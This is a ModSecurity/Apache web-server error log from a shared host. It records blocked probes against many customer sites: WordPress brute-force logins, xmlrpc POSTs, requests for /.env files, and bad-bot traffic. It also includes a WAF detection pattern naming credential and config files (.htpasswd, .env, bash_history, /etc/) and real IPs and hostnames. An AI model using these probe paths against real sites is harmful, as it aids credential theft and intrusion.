[Tue May 26 18:57:14.394692 2026] [security2:error] [pid 1036960:tid 1036985] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWfsoGNKXNii6nttH90xgAA5xg"]
[Tue May 26 18:57:14.395003 2026] [security2:error] [pid 1036960:tid 1037188] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWfsoGNKXNii6nttH90xgAA5xg"]
[Tue May 26 18:57:14.699491 2026] [security2:error] [pid 1036960:tid 1037167] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfsoGNKXNii6nttH90zAAAANI"]
[Tue May 26 18:57:15.046917 2026] [security2:error] [pid 1036960:tid 1037091] [client 188.166.247.214:57090] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "kumarindustry.svijaykumar.in"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahWfs4GNKXNii6nttH903QAAAIY"]
[Tue May 26 18:57:15.836862 2026] [security2:error] [pid 1036960:tid 1037186] [client 188.166.247.214:57382] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "kumarindustry.svijaykumar.in"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahWfs4GNKXNii6nttH908QAAAOU"]
[Tue May 26 18:57:17.279017 2026] [security2:error] [pid 1036960:tid 1037163] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWftIGNKXNii6nttH91CgAAAM4"]
[Tue May 26 18:57:17.452139 2026] [security2:error] [pid 1036960:tid 1037086] [remote 154.66.198.148:61212] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.198.66.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWftYGNKXNii6nttH91FwAAon0"]
[Tue May 26 18:57:17.557892 2026] [security2:error] [pid 1036960:tid 1037211] [client 45.154.98.38:64492] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "pronumbers.com.au"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahWftYGNKXNii6nttH91HwAAAP4"]
[Tue May 26 18:57:17.882670 2026] [security2:error] [pid 1036960:tid 1037161] [client 45.154.98.38:61463] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "pronumbers.com.au"] [uri "/sito/wp-includes/wlwmanifest.xml"] [unique_id "ahWftYGNKXNii6nttH91JAAAAMw"]
[Tue May 26 18:57:18.700177 2026] [security2:error] [pid 1036960:tid 1037189] [client 176.65.139.233:60864] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "siliconelevators.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahWftoGNKXNii6nttH91OQAAAOg"]
[Tue May 26 18:57:19.468174 2026] [security2:error] [pid 1036960:tid 1037217] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWft4GNKXNii6nttH91QAAAAQQ"]
[Tue May 26 18:57:21.847749 2026] [security2:error] [pid 1036960:tid 1037141] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfuYGNKXNii6nttH91ewAAALg"]
[Tue May 26 18:57:22.790177 2026] [security2:error] [pid 1036960:tid 1037139] [client 185.191.171.18:51270] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahWfuoGNKXNii6nttH91mwAAALY"]
[Tue May 26 18:57:22.790378 2026] [security2:error] [pid 1036960:tid 1037139] [client 185.191.171.18:51270] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahWfuoGNKXNii6nttH91mwAAALY"]
[Tue May 26 18:57:24.225731 2026] [security2:error] [pid 1036960:tid 1037199] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfu4GNKXNii6nttH91wAAAAPI"]
[Tue May 26 18:57:24.869298 2026] [security2:error] [pid 1036960:tid 1037020] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWfvIGNKXNii6nttH910gAAtDs"]
[Tue May 26 18:57:24.869546 2026] [security2:error] [pid 1036960:tid 1037137] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWfvIGNKXNii6nttH910gAAtDs"]
[Tue May 26 18:57:26.180319 2026] [security2:error] [pid 1036960:tid 1037014] [remote 51.91.98.45:56908] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWfvoGNKXNii6nttH916QAAkDU"]
[Tue May 26 18:57:26.630650 2026] [security2:error] [pid 1036960:tid 1037116] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfvoGNKXNii6nttH919QAAAJ8"]
[Tue May 26 18:57:26.689757 2026] [security2:error] [pid 1036960:tid 1037019] [remote 51.91.98.45:56908] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWfvoGNKXNii6nttH91-gAA0jo"], referer: https://triviewsolutions.com/wp-login.php
[Tue May 26 18:57:27.817700 2026] [security2:error] [pid 1036960:tid 1037034] [remote 193.42.61.12:54568] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.61.42.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWfv4GNKXNii6nttH92GAAA40k"]
[Tue May 26 18:57:28.763784 2026] [security2:error] [pid 1036960:tid 1037116] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfwIGNKXNii6nttH92MQAAAJ8"]
[Tue May 26 18:57:29.641509 2026] [security2:error] [pid 1036960:tid 1037091] [client 114.119.151.14:26039] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.godrejpest.co.in"] [uri "/images/img_2.jpg"] [unique_id "ahWfwYGNKXNii6nttH92SAAAAIY"], referer: https://www.godrejpest.co.in/images/img_2.jpg
[Tue May 26 18:57:30.949772 2026] [security2:error] [pid 1036960:tid 1037167] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfwoGNKXNii6nttH92ZwAAANI"]
[Tue May 26 18:57:31.853024 2026] [security2:error] [pid 1036960:tid 1037126] [client 147.92.54.109:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWfw4GNKXNii6nttH92hAAAAKk"], referer: https://www.anujtradingco.com/
[Tue May 26 18:57:32.458436 2026] [security2:error] [pid 1036960:tid 1037040] [remote 74.7.241.58:50514] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWfxIGNKXNii6nttH92lQAA708"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/wp-content/plugins/mailchimp-for-wp/integrations/ninja-forms
[Tue May 26 18:57:33.008510 2026] [security2:error] [pid 1036960:tid 1037148] [client 74.7.175.170:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.thedebateafrica.org"] [uri "/index.php"] [unique_id "ahWfw4GNKXNii6nttH92ewAAAL8"]
[Tue May 26 18:57:33.008533 2026] [security2:error] [pid 1036960:tid 1037148] [client 74.7.175.170:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.thedebateafrica.org"] [uri "/index.php"] [unique_id "ahWfw4GNKXNii6nttH92ewAAAL8"]
[Tue May 26 18:57:33.009567 2026] [security2:error] [pid 1036960:tid 1037157] [client 74.7.175.170:51060] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.thedebateafrica.org"] [uri "/robots.txt"] [unique_id "ahWfw4GNKXNii6nttH92eQAAyFA"]
[Tue May 26 18:57:33.244911 2026] [security2:error] [pid 1036960:tid 1037115] [client 147.92.54.109:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWfxYGNKXNii6nttH92rgAAAJ4"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1460640&moderation-hash=0844fc7d6ff7c0699f464688a803b5ad
[Tue May 26 18:57:33.257696 2026] [security2:error] [pid 1036960:tid 1037169] [client 74.7.175.170:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thedebateafrica.org"] [uri "/index.php"] [unique_id "ahWfxYGNKXNii6nttH92rQAAANQ"], referer: https://www.thedebateafrica.org/robots.txt
[Tue May 26 18:57:33.258758 2026] [security2:error] [pid 1036960:tid 1037145] [client 74.7.175.170:51066] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thedebateafrica.org"] [uri "/robots.txt"] [unique_id "ahWfxYGNKXNii6nttH92qgAAvE0"], referer: https://www.thedebateafrica.org/robots.txt
[Tue May 26 18:57:33.334164 2026] [security2:error] [pid 1036960:tid 1037166] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfxIGNKXNii6nttH92nAAAANE"]
[Tue May 26 18:57:34.051889 2026] [security2:error] [pid 1036960:tid 1037055] [remote 103.216.116.57:59224] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.116.216.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWfxYGNKXNii6nttH92wwAAml4"]
[Tue May 26 18:57:34.323339 2026] [security2:error] [pid 1036960:tid 1037200] [client 14.239.227.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfxYGNKXNii6nttH92ywAAAPM"]
[Tue May 26 18:57:34.511126 2026] [security2:error] [pid 1036960:tid 1037059] [remote 173.212.245.56:55340] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.245.212.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWfxoGNKXNii6nttH920AAA42I"]
[Tue May 26 18:57:35.550775 2026] [security2:error] [pid 1036960:tid 1037043] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWfx4GNKXNii6nttH929AAApVI"]
[Tue May 26 18:57:35.550952 2026] [security2:error] [pid 1036960:tid 1037122] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWfx4GNKXNii6nttH929AAApVI"]
[Tue May 26 18:57:36.004046 2026] [security2:error] [pid 1036960:tid 1037109] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfx4GNKXNii6nttH92-gAAAJg"]
[Tue May 26 18:57:36.464724 2026] [security2:error] [pid 1036960:tid 1037106] [client 147.92.54.109:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWfyIGNKXNii6nttH93DAAAAJU"], referer: https://anujtradingco.com
[Tue May 26 18:57:37.114355 2026] [security2:error] [pid 1036960:tid 1037188] [client 68.183.88.172:46600] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "afstpaul.org"] [uri "/"] [unique_id "ahWfyYGNKXNii6nttH93IAAAAOc"]
[Tue May 26 18:57:37.594591 2026] [security2:error] [pid 1036960:tid 1037214] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfyYGNKXNii6nttH93JgAAAQE"]
[Tue May 26 18:57:39.200394 2026] [security2:error] [pid 1036960:tid 1037209] [client 23.80.82.10:51680] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "worldwidecourier.co.in.onesoft.in"] [uri "/.env"] [unique_id "ahWfy4GNKXNii6nttH93ZAAAAPw"]
[Tue May 26 18:57:39.292295 2026] [security2:error] [pid 1036960:tid 1037123] [client 23.80.82.10:51754] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "worldwidecourier.co.in.onesoft.in"] [uri "/backend/.env"] [unique_id "ahWfy4GNKXNii6nttH93bQAAAKY"]
[Tue May 26 18:57:39.295713 2026] [security2:error] [pid 1036960:tid 1037198] [client 23.80.82.10:51748] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "worldwidecourier.co.in.onesoft.in"] [uri "/api/.env"] [unique_id "ahWfy4GNKXNii6nttH93dwAAAPE"]
[Tue May 26 18:57:39.852841 2026] [security2:error] [pid 1036960:tid 1037108] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfy4GNKXNii6nttH93gAAAAJc"]
[Tue May 26 18:57:40.775172 2026] [http2:info] [pid 1045635:tid 1045635] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 18:57:42.099603 2026] [security2:error] [pid 1045635:tid 1045840] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfzRhDcQXYr7SS5sX9dwAAAEs"]
[Tue May 26 18:57:44.823653 2026] [security2:error] [pid 1045635:tid 1045874] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWf0BhDcQXYr7SS5sX90gAAAG0"]
[Tue May 26 18:57:46.353350 2026] [security2:error] [pid 1045635:tid 1045646] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWf0hhDcQXYr7SS5sX-CgAAEQo"]
[Tue May 26 18:57:46.353570 2026] [security2:error] [pid 1045635:tid 1045782] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWf0hhDcQXYr7SS5sX-CgAAEQo"]
[Tue May 26 18:57:47.624112 2026] [security2:error] [pid 1045635:tid 1045783] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWf0xhDcQXYr7SS5sX-IwAAABI"]
[Tue May 26 18:57:49.221349 2026] [security2:error] [pid 1045635:tid 1045763] [remote 66.240.195.150:34831] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.195.240.66.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWf1BhDcQXYr7SS5sX-SAAALn8"]
[Tue May 26 18:57:49.509671 2026] [security2:error] [pid 1045635:tid 1045890] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWf1RhDcQXYr7SS5sX-UQAAAH0"]
[Tue May 26 18:57:49.918310 2026] [security2:error] [pid 1045635:tid 1045656] [remote 45.79.189.31:56220] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.189.79.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWf1RhDcQXYr7SS5sX-XAAAMhQ"]
[Tue May 26 18:57:50.181593 2026] [security2:error] [pid 1045635:tid 1045842] [client 176.65.139.233:54540] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "abrindoempresa.contabilidadecarioca.com.br"] [uri "/.env"] [unique_id "ahWf1hhDcQXYr7SS5sX-cgAAAE0"]
[Tue May 26 18:57:50.613828 2026] [core:error] [pid 1045635:tid 1045875] [client 136.0.194.203:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:57:50.613859 2026] [core:error] [pid 1045635:tid 1045875] [client 136.0.194.203:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:57:50.655044 2026] [core:error] [pid 1045635:tid 1045855] [client 172.120.101.24:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:57:50.655068 2026] [core:error] [pid 1045635:tid 1045855] [client 172.120.101.24:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:57:51.347210 2026] [security2:error] [pid 1045635:tid 1045800] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWf1hhDcQXYr7SS5sX-jgAAACM"]
[Tue May 26 18:57:53.242681 2026] [security2:error] [pid 1045635:tid 1045672] [remote 66.240.195.150:34831] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 150.195.240.66.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWf2RhDcQXYr7SS5sX-ygAAFyQ"], referer: https://canopykaapi.com/wp-login.php
